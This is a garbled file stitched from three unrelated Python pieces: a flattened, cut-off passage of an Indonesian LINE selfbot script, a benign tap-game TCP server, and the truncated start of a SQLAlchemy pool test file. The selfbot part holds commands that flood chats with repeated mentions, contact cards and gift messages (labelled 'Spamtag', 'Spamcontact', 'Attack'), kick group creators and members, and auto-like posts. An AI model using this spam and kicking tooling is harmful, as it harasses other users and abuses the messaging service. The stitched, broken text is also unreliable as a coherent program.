cl.getBlockedContactIds() kontak = cl.getContacts(blockedlist) num=1 msgs="═════════List Blocked═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Gruplist"]: gruplist = cl.getGroupIdsJoined() kontak = cl.getGroups(gruplist) num=1 msgs="═════════List Grup═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.name) num=(num+1) msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Gruplistmid"]: gruplist = cl.getGroupIdsJoined() kontak = cl.getGroups(gruplist) num=1 msgs="═════════List GrupMid═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.id) num=(num+1) msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak) cl.sendText(msg.to, msgs) elif "Grupimage: " in msg.text: saya = msg.text.replace('Grupimage: ','') gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).name gna = cl.getGroup(i) if h == saya: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif "Grupname" in msg.text: saya = msg.text.replace('Grupname','') gid = cl.getGroup(msg.to) cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name) elif "Grupid" in msg.text: saya = msg.text.replace('Grupid','') gid = cl.getGroup(msg.to) cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id) elif "Grupinfo: " in msg.text: saya = msg.text.replace('Grupinfo: ','') gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).name group = cl.getGroup(i) if h == saya: try: creator = group.creator.mid msg.contentType = 13 msg.contentMetadata = {'mid': creator} md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum 
Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang" cl.sendText(msg.to,md) cl.sendMessage(msg) cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus) except: creator = "Error" elif "Spamtag @" in msg.text: _name = msg.text.replace("Spamtag @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: xname = g.displayName xlen = str(len(xname)+1) msg.contentType = 0 msg.text = "@"+xname+" " msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) print "Spamtag Berhasil." elif "/Spamcontact @" in msg.text: _name = msg.text.replace("Spamcontact @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: msg.contentType = 13 msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"} cl.sendText(g.mid,"Spam") cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendText(msg.to, "Done") print " Spammed !" 
elif "playstore " in msg.text.lower(): tob = msg.text.lower().replace("playstore ","") cl.sendText(msg.to,"Sedang Mencari om...") cl.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob) cl.sendText(msg.to,"Ketemu om ^") elif 'wikipedia ' in msg.text.lower(): try: wiki = msg.text.lower().replace("wikipedia ","") wikipedia.set_lang("id") pesan="Title (" pesan+=wikipedia.page(wiki).title pesan+=")\n\n" pesan+=wikipedia.summary(wiki, sentences=3) pesan+="\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except: try: pesan="Teks nya kepanjangan! ketik link dibawah aja\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except Exception as e: cl.sendText(msg.to, str(e)) elif "say " in msg.text.lower(): say = msg.text.lower().replace("say ","") lang = 'id' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif msg.text in ["spam gift 25"]: msg.contentType = 9 msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4', 'PRDTYPE': 'THEME', 'MSGTPL': '8'} msg.text = None cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) elif msg.text in ["Gcreator:inv"]: if msg.from_ in admin: ginfo = cl.getGroup(msg.to) gCreator = ginfo.creator.mid try: cl.findAndAddContactsByMid(gCreator) cl.inviteIntoGroup(msg.to,[gCreator]) print "success inv gCreator" except: pass elif msg.text in ["Gcreator:kick"]: if msg.from_ in admin: ginfo = cl.getGroup(msg.to) gCreator = ginfo.creator.mid try: cl.findAndAddContactsByMid(gCreator) cl.kickoutFromGroup(msg.to,[gCreator]) print "success inv 
gCreator" except: pass elif 'lirik ' in msg.text.lower(): try: songname = msg.text.lower().replace('lirik ','') params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'Lyric Lagu (' hasil += song[0] hasil += ')\n\n' hasil += song[5] cl.sendText(msg.to, hasil) except Exception as wak: cl.sendText(msg.to, str(wak)) elif "Getcover @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Getcover @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendImageWithURL(msg.to, path) except: pass print "[Command]dp executed" elif "idline: " in msg.text: msgg = msg.text.replace('idline: ','') conn = cl.findContactsByUserid(msgg) if True: msg.contentType = 13 msg.contentMetadata = {'mid': conn.mid} cl.sendText(msg.to,"http://line.me/ti/p/~" + msgg) cl.sendMessage(msg) elif "reinvite" in msg.text.split(): if msg.toType == 2: group = cl.getGroup(msg.to) if group.invitee is not None: try: grCans = [contact.mid for contact in group.invitee] cl.findAndAddContactByMid(msg.to, grCans) cl.cancelGroupInvitation(msg.to, grCans) cl.inviteIntoGroup(msg.to, grCans) except Exception as error: print error else: if wait["lang"] == "JP": cl.sendText(msg.to,"No Invited") else: cl.sendText(msg.to,"Error") else: pass elif msg.text.lower() == 'runtime': eltime = time.time() - mulai van = "Bot sudah berjalan selama "+waktu(eltime) cl.sendText(msg.to,van) elif msg.text in ["Restart"]: cl.sendText(msg.to, "Bot has been restarted") restart_program() print "@Restart" elif msg.text in ["time"]: timeNow = datetime.now() timeHours = datetime.strftime(timeNow,"(%H:%M)") day = ["Sunday", 
"Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"] hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"] bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"] inihari = datetime.today() hr = inihari.strftime('%A') bln = inihari.strftime('%m') for i in range(len(day)): if hr == day[i]: hasil = hari[i] for k in range(0, len(bulan)): if bln == str(k): blan = bulan[k-1] rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]" client.sendText(msg.to, rst) elif "image " in msg.text: search = msg.text.replace("image ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass elif 'instagram ' in msg.text.lower(): try: instagram = msg.text.lower().replace("instagram ","") html = requests.get('https://www.instagram.com/' + instagram + '/?') soup = BeautifulSoup(html.text, 'html5lib') data = soup.find_all('meta', attrs={'property':'og:description'}) text = data[0].get('content').split() data1 = soup.find_all('meta', attrs={'property':'og:image'}) text1 = data1[0].get('content').split() user = "Name: " + text[-2] + "\n" user1 = "Username: " + text[-1] + "\n" followers = "Followers: " + text[0] + "\n" following = "Following: " + text[2] + "\n" post = "Post: " + text[4] + "\n" link = "Link: " + "https://www.instagram.com/" + instagram detail = "**INSTAGRAM INFO USER**\n" details = "\n**INSTAGRAM INFO USER**" cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details) cl.sendImageWithURL(msg.to, text1[0]) except Exception as njer: cl.sendText(msg.to, str(njer)) elif msg.text in ["Attack"]: msg.contentType = 13 
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) elif msg.text.lower() == '.....': msg.contentType = 13 msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"} cl.sendMessage(msg) #=================================PUY SCRIPT FINISHED =============================================# elif "Ban @" in msg.text: if msg.toType == 2: _name = msg.text.replace("Ban @","") _nametarget = _name.rstrip() gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,_nametarget + " Not Found") else: for target in targets: try: wait["blacklist"][target] = True cl.sendText(msg.to,_nametarget + " Succes Add to Blacklist") except: cl.sendText(msg.to,"Error") elif "Unban @" in msg.text: if msg.toType == 2: _name = msg.text.replace("Unban @","") _nametarget = _name.rstrip() gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,_nametarget + " Not Found") else: for target in targets: try: del wait["blacklist"][target] cl.sendText(msg.to,_nametarget + " Delete From Blacklist") except: cl.sendText(msg.to,_nametarget + " Not In Blacklist") elif "Ban:" in msg.text: nk0 = msg.text.replace("Ban:","") nk1 = nk0.lstrip() nk2 = nk1.replace("","") nk3 = nk2.rstrip() _name = nk3 gs = cl.getGroup(msg.to) targets = [] for s in gs.members: if _name in s.displayName: targets.append(s.mid) if targets == []: sendMessage(msg.to,"user does not exist") pass else: for target in targets: try: wait["blacklist"][target] = True f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, 
indent=4,ensure_ascii=False) cl.sendText(msg.to,_name + " Succes Add to Blacklist") except: cl.sendText(msg.to,"Error") elif "Unban:" in msg.text: nk0 = msg.text.replace("Unban:","") nk1 = nk0.lstrip() nk2 = nk1.replace("","") nk3 = nk2.rstrip() _name = nk3 gs = cl.getGroup(msg.to) targets = [] for s in gs.members: if _name in s.displayName: targets.append(s.mid) if targets == []: sendMessage(msg.to,"user does not exist") pass else: for target in targets: try: del wait["blacklist"][target] f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) cl.sendText(msg.to,_name + " Delete From Blacklist") except: cl.sendText(msg.to,_name + " Not In Blacklist") elif msg.text in ["Clear"]: wait["blacklist"] = {} cl.sendText(msg.to,"Blacklist Telah Dibersihkan") elif msg.text in ["Ban:on"]: wait["wblacklist"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Unban:on"]: wait["dblacklist"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Banlist"]: if wait["blacklist"] == {}: cl.sendText(msg.to,"Tidak Ada Blacklist") else: cl.sendText(msg.to,"Daftar Banlist") num=1 msgs="*Blacklist*" for mi_d in wait["blacklist"]: msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName) num=(num+1) msgs+="\n*Blacklist*\n\nTotal Blacklist : %i" % len(wait["blacklist"]) cl.sendText(msg.to, msgs) elif msg.text in ["Conban","Contactban","Contact ban"]: if wait["blacklist"] == {}: cl.sendText(msg.to,"Tidak Ada Blacklist") else: cl.sendText(msg.to,"Daftar Blacklist") h = "" for i in wait["blacklist"]: h = cl.getContact(i) M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': i} cl.sendMessage(M) elif msg.text in ["Midban","Mid ban"]: if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) num=1 cocoa = "══════════List Blacklist═════════" for mm 
in matched_list: cocoa+="\n[%i] %s" % (num, mm) num=(num+1) cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list) cl.sendText(msg.to,cocoa) elif msg.text.lower() == 'scan blacklist': if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) if matched_list == []: cl.sendText(msg.to,"Tidak ada Daftar Blacklist") return for jj in matched_list: try: cl.kickoutFromGroup(msg.to,[jj]) print (msg.to,[jj]) except: pass #==============================================# if op.type == 17: if op.param2 not in Bots: if op.param2 in Bots: pass if wait["protect"] == True: if wait["blacklist"][op.param2] == True: try: cl.kickoutFromGroup(op.param1,[op.param2]) G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.updateGroup(G) except: try: cl.kickoutFromGroup(op.param1,[op.param2]) G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.updateGroup(G) except: pass if op.type == 19: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["protect"] == True: wait ["blacklist"][op.param2] = True cl.kickoutFromGroup(op.param1,[op.param2]) cl.inviteIntoGroup(op.param1,[op.param2]) if op.type == 13: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True cl.kickoutFromGroup(op.param1,[op.param2]) if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["cancelprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) if op.type == 11: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["linkprotect"] == True: wait ["blacklist"][op.param2] = True G = cl.getGroup(op.param1) 
G.preventJoinByTicket = True cl.updateGroup(G) cl.kickoutFromGroup(op.param1,[op.param2]) if op.type == 5: if wait["autoAdd"] == True: if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) if op.type == 11: if wait["linkprotect"] == True: if op.param2 not in Bots: G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.kickoutFromGroup(op.param1,[op.param3]) cl.updateGroup(G) if op.type == 17: if op.param2 in Bots: return ginfo = cl.getGroup(op.param1) random.choice(KAC).sendText(op.param1, "Selamat Datang.") print "MEMBER HAS JOIN THE GROUP" if op.type == 15: if op.param2 in Bots: return random.choice(KAC).sendText(op.param1, "Selamat Jalan.") print "MEMBER HAS LEFT THE GROUP" #------------------------------------------------------------------------------# if op.type == 55: try: if op.param1 in wait2['readPoint']: if op.param2 in wait2['readMember'][op.param1]: pass else: wait2['readMember'][op.param1] += op.param2 wait2['ROM'][op.param1][op.param2] = op.param2 with open('sider.json', 'w') as fp: json.dump(wait2, fp, sort_keys=True, indent=4) else: pass except: pass if op.type == 59: print op except Exception as error: print error def autolike(): count = 1 while True: try: for posts in cl.activity(1)["result"]["posts"]: if posts["postInfo"]["liked"] is False: if wait["likeOn"] == True: cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001) print "Like" if wait["commentOn"] == True: if posts["userInfo"]["writerMid"] in wait["commentBlack"]: pass else: cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"]) except: count += 1 if(count == 50): sys.exit(0) else: pass thread2 = threading.Thread(target=autolike) thread2.daemon = True thread2.start() def likefriend(): for zx in range(0,20): hasil = cl.activity(limit=20) if hasil['result']['posts'][zx]['postInfo']['liked'] == False: try: 
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001) print "Like" except: pass else: print "Already Liked Om" time.sleep(0.60) def likeme(): for zx in range(0,20): hasil = cl.activity(limit=20) if hasil['result']['posts'][zx]['postInfo']['liked'] == False: if hasil['result']['posts'][zx]['userInfo']['mid'] in mid: try: cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002) print "Like" except: pass else: print "Status Sudah di Like Om" while True: try: Ops = cl.fetchOps(cl.Poll.rev, 5) except EOFError: raise Exception("It might be wrong revision\n" + str(cl.Poll.rev)) for Op in Ops: if (Op.type != OpType.END_OF_OPERATION): cl.Poll.rev = max(cl.Poll.rev, Op.revision) bot(Op)
# ===== server.py =====
import socket
from select import select
from utils import send
import pygame
import sys
import csv
from time import time
import os
import json
import threading
import config as cfg


class Server:
    """Tap-game relay server.

    Each client opens two TCP connections: one on ``port`` over which the
    server pushes game-state updates, and one on ``port + 1`` over which the
    client sends JSON commands ("TAP" / "CLOSE").  Every broadcast state is
    also appended to a timestamped CSV log under ``./data/``.
    """

    def __init__(self, host: str, port: int):
        self._host = host
        self._port = port

        # Sockets subscribed to state updates.
        self._to_client_connections = []
        # Maps command socket -> client name (first JSON payload the client sends).
        self._from_client_connections = {}

        # Listening socket on which clients subscribe to game-state updates.
        self._to_client_request = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._to_client_request.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # Reuse socket
        self._to_client_request.bind((self._host, self._port))
        self._to_client_request.setblocking(False)

        # Listening socket on which clients send control commands.
        self._from_client_request = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._from_client_request.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # Reuse socket
        self._from_client_request.bind((self._host, self._port + 1))
        self._from_client_request.setblocking(False)

        self._exit_request = False
        self._state = {}                  # client name -> 0/1 ("tapped" this tick)
        self._current_session_index = -1  # -1 = pre-game countdown
        self._paused = True
        self._counter = 0.0
        self._counter_target = cfg.SECONDS_COUNT_DOWN
        self._thread_lock = threading.Lock()

        print(f"[NETWORK] ({self._host}, {self._port})")

        csv_data_path = "./data/"
        if not os.path.exists(csv_data_path):
            os.makedirs(csv_data_path)
        self._csv_file = open(csv_data_path + str(int(time())) + ".csv", 'w', newline='')
        self._csv_writer = csv.writer(self._csv_file, delimiter=';')

    def run(self):
        """Start all worker threads and block until they finish."""
        to_client_request_thread = threading.Thread(
            target=self._dispatch_to_client_request, daemon=True)
        to_client_request_thread.start()

        from_client_request_thread = threading.Thread(
            target=self._dispatch_from_client_request, daemon=True)
        from_client_request_thread.start()

        from_client_commands_thread = threading.Thread(
            target=self._from_client_commands, daemon=True)
        from_client_commands_thread.start()

        to_client_update_state_thread = threading.Thread(
            target=self._to_client_update_state, daemon=True)
        to_client_update_state_thread.start()

        server_control_thread = threading.Thread(
            target=self._server_control, daemon=True)
        server_control_thread.start()

        # Wait for threads to finish
        to_client_request_thread.join()
        from_client_request_thread.join()
        from_client_commands_thread.join()
        to_client_update_state_thread.join()
        server_control_thread.join()

        # Close server connection
        self._to_client_request.close()
        self._from_client_request.close()
        # FIX: the CSV log was never closed, so buffered rows could be lost.
        self._csv_file.close()

    def _dispatch_to_client_request(self):
        """Accept clients that want to receive game-state updates."""
        # Listen for client connection
        self._to_client_request.listen()

        while not self._exit_request:
            readable, _, _ = select([self._to_client_request], [],
                                    [self._to_client_request], 0.1)
            if readable:
                client_conn, client_addr = readable[0].accept()
                client_conn.setblocking(False)
                self._to_client_connections.append(client_conn)
                print("Sending replies to [" + client_addr[0] + ", " + str(client_addr[1]) + ']')

    def _dispatch_from_client_request(self):
        """Accept clients that will send commands; first payload is the client name."""
        # Listen for client connection
        self._from_client_request.listen()

        while not self._exit_request:
            readable, _, _ = select([self._from_client_request], [],
                                    [self._from_client_request], 0.1)
            if readable:
                client_conn, client_addr = readable[0].accept()
                client_conn.setblocking(False)

                # Block until the client sends its name (no timeout, as before).
                client_name_read, _, _ = select([client_conn], [], [client_conn])
                if client_name_read:
                    client_name = json.loads(client_name_read[0].recv(cfg.HEADER).decode('utf-8'))
                else:
                    print("Connection closed")
                    continue

                with self._thread_lock:
                    self._from_client_connections[client_conn] = client_name
                    self._state[client_name] = 0

                print("Receiving commands from [" + client_name + ", " +
                      client_addr[0] + ", " + str(client_addr[1]) + ']')

    def _broadcast(self, data):
        """Send *data* to every writable subscriber; drop subscribers that fail."""
        _, writable, exceptional = select([], self._to_client_connections,
                                          self._to_client_connections, 0)
        for connection in writable:
            try:
                send(connection, data)
            except Exception:
                # FIX: was a bare `except:`, which also swallowed
                # KeyboardInterrupt/SystemExit.
                print("Connection closed")
                connection.close()
                self._to_client_connections.remove(connection)
        for connection in exceptional:
            connection.close()
            self._to_client_connections.remove(connection)

    def _current_state_message(self):
        """Build the state payload broadcast to clients."""
        return {
            "message_type": "state",
            "state": self._state,
            "session_index": self._current_session_index,
            "timer": int(self._counter_target - self._counter + 1.0),
        }

    def _to_client_update_state(self):
        """Advance the session timer and broadcast game state to clients."""
        start_ticks = pygame.time.get_ticks()
        clock = pygame.time.Clock()

        while not self._exit_request:
            if self._paused:
                # While paused, keep clients informed but do not advance the
                # timer, and keep resetting the reference tick.
                self._broadcast(self._current_state_message())
                start_ticks = pygame.time.get_ticks()
                clock.tick(10)
                continue

            seconds = (pygame.time.get_ticks() - start_ticks) / 1000.0
            if self._counter > self._counter_target:
                # Current session elapsed: move to the next one (or exit).
                self._current_session_index += 1
                if self._current_session_index >= len(cfg.SESSION):
                    self._exit_request = True
                    break
                self._counter_target = cfg.SECONDS_PER_SESSION[self._current_session_index]
                self._counter = 0.0
                start_ticks = pygame.time.get_ticks()
            elif seconds >= self._counter:
                self._counter += 1.0

            data = self._current_state_message()
            # Record state of the game
            self._csv_writer.writerow([time(), json.dumps(data)])
            self._broadcast(data)
            clock.tick(60)

        # Tell every remaining subscriber to shut down, then close it.
        while self._to_client_connections:
            _, writable, exceptional = select([], self._to_client_connections,
                                              self._to_client_connections)
            for connection in writable:
                data = {"message_type": "command", "message": "CLOSE"}
                try:
                    send(connection, data)
                except BrokenPipeError:
                    print("Connection closed")
                connection.close()
                self._to_client_connections.remove(connection)
            for connection in exceptional:
                connection.close()
                self._to_client_connections.remove(connection)
            clock.tick(60)

    def _drop_client(self, connection, client_name):
        """Close a command connection and remove its bookkeeping under the lock."""
        connection.close()
        with self._thread_lock:
            del self._from_client_connections[connection]
            del self._state[client_name]

    def _from_client_commands(self):
        """Handle clients' commands ("TAP" sets the client's state bit for this tick)."""
        while not self._exit_request:
            readable, _, exceptional = select(self._from_client_connections.keys(), [],
                                              self._from_client_connections.keys(), 0.2)

            # Reset every tap flag; readable TAPs below re-set them.
            for name in self._state.keys():
                self._state[name] = 0

            for connection in readable:
                client_name = self._from_client_connections[connection]
                try:
                    message = connection.recv(cfg.HEADER)
                except OSError:
                    # Abrupt disconnect (e.g. ECONNRESET): treat like a close.
                    message = b''
                if not message:
                    # FIX: an empty recv() means the peer closed its end. The
                    # original `continue` left the dead socket registered, so
                    # select() reported it readable forever (busy loop + leak).
                    self._drop_client(connection, client_name)
                    continue
                try:
                    command = json.loads(message.decode('utf-8'))
                except json.decoder.JSONDecodeError as err:
                    print(err)
                    continue
                if command == "TAP":
                    self._state[client_name] = 1
                elif command == "CLOSE":
                    self._drop_client(connection, client_name)

            for connection in exceptional:
                # FIX: the original deleted `self._state[client_name]` using a
                # stale `client_name` left over from the readable loop (wrong
                # entry removed, or NameError when `readable` was empty).
                self._drop_client(connection, self._from_client_connections[connection])

        for connection in self._from_client_connections:
            connection.close()

    def _server_control(self):
        """Read operator commands from stdin to control the server."""
        while not self._exit_request:
            readable, _, _ = select([sys.stdin], [], [], 0.5)
            if not readable:
                continue
            command = readable[0].readline().strip()
            if command == "h" or command == "help":
                print("-----")
                print("unpause: Unpause the game")
                print("restart: Restart the game")
                print("exit: Close the server")
                print("h or help: List available commands")
                print("-----")
            elif command == "unpause":
                self._paused = False
            elif command == "restart":
                # Back to the paused pre-game countdown.
                self._paused = True
                self._counter = 0.0
                self._counter_target = cfg.SECONDS_COUNT_DOWN
                self._current_session_index = -1
            elif command == "exit":
                self._exit_request = True
            else:
                print("Unknown command")


if __name__ == "__main__":
    pygame.init()
    assert len(sys.argv) >= 2
    host = sys.argv[1]
    port = 6060 if len(sys.argv) < 3 else int(sys.argv[2])
    server = Server(host, port)
    server.run()
# ===== test_pool.py =====
import threading import time from sqlalchemy import pool, select, event import sqlalchemy as tsa from sqlalchemy import testing from sqlalchemy.testing.util import gc_collect, lazy_gc from sqlalchemy.testing import eq_, assert_raises, is_not_ from sqlalchemy.testing.engines import testing_engine from sqlalchemy.testing import fixtures from sqlalchemy.testing.mock import Mock, call join_timeout = 10 def MockDBAPI(): def cursor(): while True: yield Mock() def connect(): while True: yield Mock(cursor=Mock(side_effect=cursor())) def shutdown(value): if value: db.connect = Mock(side_effect=Exception("connect failed")) else: db.connect = Mock(side_effect=connect()) db = Mock(connect=Mock(side_effect=connect()), shutdown=shutdown, _shutdown=False) return db class PoolTestBase(fixtures.TestBase): def setup(self): pool.clear_managers() @classmethod def teardown_class(cls): pool.clear_managers() def _queuepool_fixture(self, **kw): dbapi, pool = self._queuepool_dbapi_fixture(**kw) return pool def _queuepool_dbapi_fixture(self, **kw): dbapi = MockDBAPI() return dbapi, pool.QueuePool(creator=lambda: dbapi.connect('foo.db'), **kw) class PoolTest(PoolTestBase): def test_manager(self): manager = pool.manage(MockDBAPI(), use_threadlocal=True) c1 = manager.connect('foo.db') c2 = manager.connect('foo.db') c3 = manager.connect('bar.db') c4 = manager.connect("foo.db", bar="bat") c5 = manager.connect("foo.db", bar="hoho") c6 = manager.connect("foo.db", bar="bat") assert c1.cursor() is not None assert c1 is c2 assert c1 is not c3 assert c4 is c6 assert c4 is not c5 def test_manager_with_key(self): dbapi = MockDBAPI() manager = pool.manage(dbapi, use_threadlocal=True) c1 = manager.connect('foo.db', sa_pool_key="a") c2 = manager.connect('foo.db', sa_pool_key="b") c3 = manager.connect('bar.db', sa_pool_key="a") assert c1.cursor() is not None assert c1 is not c2 assert c1 is c3 eq_(dbapi.connect.mock_calls, [ call("foo.db"), call("foo.db"), ] ) def test_bad_args(self): manager = 
pool.manage(MockDBAPI()) manager.connect(None) def test_non_thread_local_manager(self): manager = pool.manage(MockDBAPI(), use_threadlocal=False) connection = manager.connect('foo.db') connection2 = manager.connect('foo.db') self.assert_(connection.cursor() is not None) self.assert_(connection is not connection2) @testing.fails_on('+pyodbc', "pyodbc cursor doesn't implement tuple __eq__") def test_cursor_iterable(self): conn = testing.db.raw_connection() cursor = conn.cursor() cursor.execute(str(select([1], bind=testing.db))) expected = [(1, )] for row in cursor: eq_(row, expected.pop(0)) def test_no_connect_on_recreate(self): def creator(): raise Exception("no creates allowed") for cls in (pool.SingletonThreadPool, pool.StaticPool, pool.QueuePool, pool.NullPool, pool.AssertionPool): p = cls(creator=creator) p.dispose() p2 = p.recreate() assert p2.__class__ is cls mock_dbapi = MockDBAPI() p = cls(creator=mock_dbapi.connect) conn = p.connect() conn.close() mock_dbapi.connect.side_effect = Exception("error!") p.dispose() p.recreate() def testthreadlocal_del(self): self._do_testthreadlocal(useclose=False) def testthreadlocal_close(self): self._do_testthreadlocal(useclose=True) def _do_testthreadlocal(self, useclose=False): dbapi = MockDBAPI() for p in pool.QueuePool(creator=dbapi.connect, pool_size=3, max_overflow=-1, use_threadlocal=True), \ pool.SingletonThreadPool(creator=dbapi.connect, use_threadlocal=True): c1 = p.connect() c2 = p.connect() self.assert_(c1 is c2) c3 = p.unique_connection() self.assert_(c3 is not c1) if useclose: c2.close() else: c2 = None c2 = p.connect() self.assert_(c1 is c2) self.assert_(c3 is not c1) if useclose: c2.close() else: c2 = None lazy_gc() if useclose: c1 = p.connect() c2 = p.connect() c3 = p.connect() c3.close() c2.close() self.assert_(c1.connection is not None) c1.close() c1 = c2 = c3 = None # extra tests with QueuePool to ensure connections get # __del__()ed when dereferenced if 